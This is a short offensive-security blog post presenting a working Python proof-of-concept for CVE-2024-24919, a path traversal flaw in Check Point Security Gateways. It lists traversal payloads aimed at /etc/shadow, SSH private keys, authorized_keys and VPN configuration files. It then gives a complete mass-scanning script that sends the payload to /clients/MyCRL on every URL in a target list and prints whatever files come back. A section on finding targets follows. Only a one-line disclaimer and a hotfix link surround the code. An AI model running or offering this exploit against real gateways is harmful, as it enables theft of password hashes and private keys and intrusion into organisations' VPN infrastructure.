Post

CVE-2024-24919

Allows an attacker to read certain information on Check Point Security Gateways once connected to the internet and enabled with remote Access VPN or Mobile Access Software Blades.

Posted Updated
Preview Image
By Berrick Werkman
2 min read

Proof of Concept python script that exploits what’s essentially a path traversal issue.

Below are a list of files that are vulnerable - including the shadow file which contains the hashed passwords.

  1. ../../../../../../../etc/fstab
  2. ../../../../../../../etc/shadow
  3. ../../../../../../../sysimg/CPwrapper/SU/Products.conf
  4. ../../../../../../../config/db/initial
  5. ../../../../../../../etc/passwd
  6. ../../../../../../../home/*/.ssh/authorized_keys
  7. ../../../../../../../opt/checkpoint/conf/
  8. ../../../../../../../etc/ssh/sshd_config
  9. ../../../../../../../etc/vpn/vpn.conf
  10. ../../../../../../../home/*/.ssh/id_rsa

The PoC Script

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82

import argparse
import requests
from requests.packages.urllib3.exceptions import InsecureRequestWarning

# Suppress SSL warnings
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

vuln = ['root:', 'nobody:']

def make_request(url, payload=None, headers=None):
    try:
        response = requests.post(url, data=payload, headers=headers, verify=False)
        if response.ok:
            for word in vuln:
                if word in response.text:
                    print(f"[+] {url} is vulnerable")
                    if payload and payload.startswith("aCSHELL/../../../../../../../etc/shadow"):
                        print("╔══════════════════════════════════════════════════════╗")
                        print("║                      etc/shadow found:               ║")
                        print("╚══════════════════════════════════════════════════════╝")
                        print("╔══════════════════════════════════════════════════════╗")
                        print(f"                      {response.text}                ")
                        print("╚══════════════════════════════════════════════════════╝")
                    elif payload:
                        print("╔══════════════════════════════════════════════════════╗")
                        print("║                      Your file was found:            ║")
                        print("╚══════════════════════════════════════════════════════╝")
                        print("╔══════════════════════════════════════════════════════╗")
                        print(f"                      {response.text}                ")
                        print("╚══════════════════════════════════════════════════════╝")
                    return
            print(f"[-] {url} is not vulnerable")
        else:
            print(f"[-] {url} responded with status code: {response.status_code}")
    except requests.RequestException as e:
        print(f"Error making request to {url}: {e}")

def main():
    payload = "aCSHELL/../../../../../../../etc/shadow"
    parser = argparse.ArgumentParser(description="CVE-2024-24919 POC")
    parser.add_argument("-l", metavar='filename', type=str, help="File containing list of HTTP/HTTPS targets")
    parser.add_argument("-f", metavar='file', type=str, help="File to read for custom payload (May break on multiple targets with unknown files.)")
    args = parser.parse_args()

    headers = {
        "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0",
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
        "Accept-Language": "en-US,en;q=0.5",
        "Accept-Encoding": "gzip, deflate, br",
        "Upgrade-Insecure-Requests": "1",
        "Sec-Fetch-Dest": "document",
        "Sec-Fetch-Mode": "navigate",
        "Sec-Fetch-Site": "none",
        "Sec-Fetch-User": "?1",
        "Dnt": "1",
        "Sec-Gpc": "1",
        "Te": "trailers",
        "Connection": "close"
    }

    payload_base = "aCSHELL/../../../../../../../{}"

    if args.f:
        payload = payload_base.format(args.f)

    if args.l:
        try:
            with open(args.l, 'r') as file:
                urls = file.readlines()
                for url in urls:
                    url = url.strip()
                    if url.startswith('http://') or url.startswith('https://'):
                        make_request(url + '/clients/MyCRL', payload=payload, headers=headers)
                    else:
                        print(f"Skipping invalid URL: {url}")
        except FileNotFoundError:
            print(f"Error: File '{args.l}' not found.")
    else:
        print("Please provide a file containing list of HTTP/HTTPS targets using -l option.")

if __name__ == "__main__":
    main()

Finding targets

Desktop View

Desktop View

Example of usage

Desktop View

Example of output

Desktop View

This is for educational purposes. Only try this on systems you own. Please don’t do anything illegal.

Check Point released a hotfix for this, you can read more about it here: https://support.checkpoint.com/results/sk/sk182336

CyberSecurity, Offensive Security
offsec
This post is licensed under CC BY 4.0 by the author.